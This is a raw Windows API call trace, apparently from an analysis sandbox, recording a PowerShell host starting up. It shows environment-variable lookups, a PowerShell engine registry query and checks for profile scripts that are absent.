	[0789.939] GetUserNameW (in: lpBuffer=0x343ca0, pcbBuffer=0xed4e8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xed4e8) returned 1
	[0789.939] CoTaskMemFree (pv=0x343ca0) 
	[0789.939] ReportEventW (hEventLog=0x1b7d0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e39d60*="Certificate", lpRawData=0x2e39af0) returned 1
	[0790.230] CoTaskMemAlloc (cb=0x104) returned 0x1b6e3570
	[0790.230] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e3570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0790.230] CoTaskMemFree (pv=0x1b6e3570) 
	[0790.237] GetLogicalDrives () returned 0x4
	[0790.237] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xed130, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0790.237] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0790.238] CoTaskMemAlloc (cb=0x20e) returned 0x39b650
	[0790.238] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x39b650 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0790.238] CoTaskMemFree (pv=0x39b650) 
	[0790.240] CoTaskMemAlloc (cb=0x104) returned 0x1b6e3570
	[0790.240] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e3570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0790.240] CoTaskMemFree (pv=0x1b6e3570) 
	[0790.240] CoTaskMemAlloc (cb=0x104) returned 0x1b6e3570
	[0790.240] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e3570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0790.240] CoTaskMemFree (pv=0x1b6e3570) 
	[0790.260] CoTaskMemAlloc (cb=0x104) returned 0x1b6e3570
	[0790.260] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e3570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0790.260] CoTaskMemFree (pv=0x1b6e3570) 
	[0790.261] CoTaskMemAlloc (cb=0x104) returned 0x1b6e3570
	[0790.261] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e3570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0790.261] CoTaskMemFree (pv=0x1b6e3570) 
	[0790.262] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xece90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0790.262] SetErrorMode (uMode=0x1) returned 0x1
	[0790.262] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xed0f0 | out: lpFileInformation=0xed0f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0790.262] SetErrorMode (uMode=0x1) returned 0x1
	[0790.262] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xece90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0790.262] SetErrorMode (uMode=0x1) returned 0x1
	[0790.262] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xed0f0 | out: lpFileInformation=0xed0f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0790.262] SetErrorMode (uMode=0x1) returned 0x1
	[0790.263] CoTaskMemAlloc (cb=0x104) returned 0x1b6e3570
	[0790.263] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e3570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0790.263] CoTaskMemFree (pv=0x1b6e3570) 
	[0790.265] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xed030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0790.267] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xed150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0790.267] SetErrorMode (uMode=0x1) returned 0x1
	[0790.267] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xed3b0 | out: lpFileInformation=0xed3b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0790.267] SetErrorMode (uMode=0x1) returned 0x1
	[0791.215] CoTaskMemAlloc (cb=0x804) returned 0x1b6f4400
	[0791.216] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b6f4400, nSize=0xed718 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xed718) returned 0x1
	[0791.216] CoTaskMemFree (pv=0x1b6f4400) 
	[0791.216] CoTaskMemAlloc (cb=0x204) returned 0x343ca0
	[0791.216] GetUserNameW (in: lpBuffer=0x343ca0, pcbBuffer=0xed758 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xed758) returned 1
	[0791.216] CoTaskMemFree (pv=0x343ca0) 
	[0791.217] ReportEventW (hEventLog=0x1b7d0008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e72a48*="Available", lpRawData=0x2e727d8) returned 1
	[0791.954] CoTaskMemAlloc (cb=0x104) returned 0x1b6e3570
	[0791.954] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e3570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0791.954] CoTaskMemFree (pv=0x1b6e3570) 
	[0791.955] CoTaskMemAlloc (cb=0x104) returned 0x1b6e3570
	[0791.956] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e3570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0791.956] CoTaskMemFree (pv=0x1b6e3570) 
	[0791.959] CoTaskMemAlloc (cb=0x104) returned 0x1b6e3570
	[0791.959] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x1b6e3570, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0791.959] CoTaskMemFree (pv=0x1b6e3570) 
	[0791.959] CoTaskMemAlloc (cb=0x104) returned 0x1b6e3570
	[0791.959] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x1b6e3570, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0791.959] CoTaskMemFree (pv=0x1b6e3570) 
	[0791.962] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xed738 | out: phkResult=0xed738*=0x39c) returned 0x0
	[0791.963] RegQueryValueExW (in: hKey=0x39c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed6bc, lpData=0x0, lpcbData=0xed6b8*=0x0 | out: lpType=0xed6bc*=0x1, lpData=0x0, lpcbData=0xed6b8*=0x56) returned 0x0
	[0791.963] CoTaskMemAlloc (cb=0x5a) returned 0x1b705860
	[0791.963] RegQueryValueExW (in: hKey=0x39c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed68c, lpData=0x1b705860, lpcbData=0xed688*=0x56 | out: lpType=0xed68c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xed688*=0x56) returned 0x0
	[0791.963] CoTaskMemFree (pv=0x1b705860) 
	[0791.963] RegCloseKey (hKey=0x39c) returned 0x0
	[0791.965] CoTaskMemAlloc (cb=0x104) returned 0x1b6e3570
	[0791.965] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e3570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0791.965] CoTaskMemFree (pv=0x1b6e3570) 
	[0791.992] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0791.992] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0791.992] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0791.993] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0791.993] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0791.993] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0791.994] VirtualQuery (in: lpAddress=0xeb790, lpBuffer=0xec650, dwLength=0x30 | out: lpBuffer=0xec650*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0791.994] CoTaskMemAlloc (cb=0x104) returned 0x1b6e3570
	[0791.994] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e3570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0791.994] CoTaskMemFree (pv=0x1b6e3570) 
	[0792.831] CoTaskMemAlloc (cb=0x104) returned 0x1b6e3570
	[0792.831] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e3570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0792.831] CoTaskMemFree (pv=0x1b6e3570) 
	[0792.832] CoTaskMemAlloc (cb=0x104) returned 0x1b6e3570
	[0792.832] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e3570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0792.832] CoTaskMemFree (pv=0x1b6e3570) 
	[0792.832] CoTaskMemAlloc (cb=0x104) returned 0x1b6e3570
	[0792.832] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e3570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0792.832] CoTaskMemFree (pv=0x1b6e3570) 
	[0792.833] CoTaskMemAlloc (cb=0x104) returned 0x1b6e3570
	[0792.833] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e3570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0792.833] CoTaskMemFree (pv=0x1b6e3570) 
	[0792.837] CoTaskMemAlloc (cb=0x104) returned 0x1b6e3570
	[0792.837] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e3570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0792.837] CoTaskMemFree (pv=0x1b6e3570) 
	[0792.838] CoTaskMemAlloc (cb=0x104) returned 0x1b6e3570
	[0792.838] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e3570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0792.838] CoTaskMemFree (pv=0x1b6e3570) 
	[0793.921] CoTaskMemAlloc (cb=0x104) returned 0x1b6e3570
	[0793.921] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e3570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0793.921] CoTaskMemFree (pv=0x1b6e3570) 
	[0796.171] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x1b6e3680
	[0796.174] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x1b6e3790
	[0799.395] CoTaskMemAlloc (cb=0x104) returned 0x1b6e38a0
	[0799.395] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e38a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0799.395] CoTaskMemFree (pv=0x1b6e38a0) 
	[0800.304] CoTaskMemAlloc (cb=0x104) returned 0x1b6e38a0
	[0800.304] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e38a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0800.305] CoTaskMemFree (pv=0x1b6e38a0) 
	[0800.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0800.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0800.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0800.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0801.184] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xed898 | out: phkResult=0xed898*=0x3a0) returned 0x0
	[0801.184] RegQueryValueExW (in: hKey=0x3a0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed81c, lpData=0x0, lpcbData=0xed818*=0x0 | out: lpType=0xed81c*=0x1, lpData=0x0, lpcbData=0xed818*=0x56) returned 0x0
	[0801.184] CoTaskMemAlloc (cb=0x5a) returned 0x1b7093e0
	[0801.184] RegQueryValueExW (in: hKey=0x3a0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed7ec, lpData=0x1b7093e0, lpcbData=0xed7e8*=0x56 | out: lpType=0xed7ec*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xed7e8*=0x56) returned 0x0
	[0801.184] CoTaskMemFree (pv=0x1b7093e0) 
	[0801.184] RegCloseKey (hKey=0x3a0) returned 0x0
	[0801.185] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xed898 | out: phkResult=0xed898*=0x3a0) returned 0x0
	[0801.185] RegQueryValueExW (in: hKey=0x3a0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed81c, lpData=0x0, lpcbData=0xed818*=0x0 | out: lpType=0xed81c*=0x1, lpData=0x0, lpcbData=0xed818*=0x56) returned 0x0
	[0801.185] CoTaskMemAlloc (cb=0x5a) returned 0x1b7093e0
	[0801.185] RegQueryValueExW (in: hKey=0x3a0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed7ec, lpData=0x1b7093e0, lpcbData=0xed7e8*=0x56 | out: lpType=0xed7ec*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xed7e8*=0x56) returned 0x0
	[0801.185] CoTaskMemFree (pv=0x1b7093e0) 
	[0801.185] RegCloseKey (hKey=0x3a0) returned 0x0
	[0801.188] CoTaskMemAlloc (cb=0x20c) returned 0x3bc1c0
	[0801.188] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x3bc1c0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0801.189] CoTaskMemFree (pv=0x3bc1c0) 
	[0801.189] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0xed450, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0801.189] CoTaskMemAlloc (cb=0x20c) returned 0x3bc1c0
	[0801.189] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x3bc1c0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0801.190] CoTaskMemFree (pv=0x3bc1c0) 
	[0801.190] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0xed450, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0801.193] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0xed5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0801.193] SetErrorMode (uMode=0x1) returned 0x1
	[0801.193] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xed800 | out: lpFileInformation=0xed800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0801.193] SetErrorMode (uMode=0x1) returned 0x1
	[0801.194] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0xed5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0801.194] SetErrorMode (uMode=0x1) returned 0x1
	[0801.194] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xed800 | out: lpFileInformation=0xed800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0801.194] SetErrorMode (uMode=0x1) returned 0x1
	[0801.194] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0xed5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0801.194] SetErrorMode (uMode=0x1) returned 0x1
	[0801.194] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xed800 | out: lpFileInformation=0xed800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0801.194] SetErrorMode (uMode=0x1) returned 0x1
	[0801.195] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0xed5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0801.195] SetErrorMode (uMode=0x1) returned 0x1
	[0801.195] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xed800 | out: lpFileInformation=0xed800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0801.195] SetErrorMode (uMode=0x1) returned 0x1
	[0801.198] CoTaskMemAlloc (cb=0x104) returned 0x1b6e38a0
	[0801.198] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e38a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0801.198] CoTaskMemFree (pv=0x1b6e38a0) 
	[0801.199] CoTaskMemAlloc (cb=0x104) returned 0x1b6e38a0
	[0801.199] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e38a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0801.199] CoTaskMemFree (pv=0x1b6e38a0) 
	[0801.202] CoTaskMemAlloc (cb=0x104) returned 0x1b6e38a0
	[0801.202] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e38a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0801.202] CoTaskMemFree (pv=0x1b6e38a0) 
	[0801.205] CoTaskMemAlloc (cb=0x104) returned 0x1b6e38a0
	[0801.205] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e38a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0801.205] CoTaskMemFree (pv=0x1b6e38a0) 
	[0801.210] CoTaskMemAlloc (cb=0x104) returned 0x1b6e38a0
	[0801.210] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e38a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0801.211] CoTaskMemFree (pv=0x1b6e38a0) 
	[0801.212] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x31c
	[0801.213] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x310
	[0801.213] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3a4
	[0801.213] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x32c
	[0801.213] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x330
	[0801.213] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x334
	[0801.213] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x338
	[0801.213] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x33c
	[0801.213] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x340
	[0801.213] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x344
	[0801.214] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x348
	[0801.214] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3a8
	[0801.216] CoTaskMemAlloc (cb=0x104) returned 0x1b6e38a0
	[0801.216] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e38a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0801.216] CoTaskMemFree (pv=0x1b6e38a0) 
	[0801.219] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0801.219] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0xed9e0 | out: lpMode=0xed9e0) returned 1
	[0802.173] CoTaskMemAlloc (cb=0x104) returned 0x1b6e38a0
	[0802.173] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e38a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0802.173] CoTaskMemFree (pv=0x1b6e38a0) 
	[0802.176] SetEvent (hEvent=0x32c) returned 1
	[0802.177] SetEvent (hEvent=0x31c) returned 1
	[0802.177] SetEvent (hEvent=0x310) returned 1
	[0802.177] SetEvent (hEvent=0x3a4) returned 1
	[0802.178] CoTaskMemAlloc (cb=0x104) returned 0x1b6e38a0
	[0802.178] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e38a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0802.179] CoTaskMemFree (pv=0x1b6e38a0) 
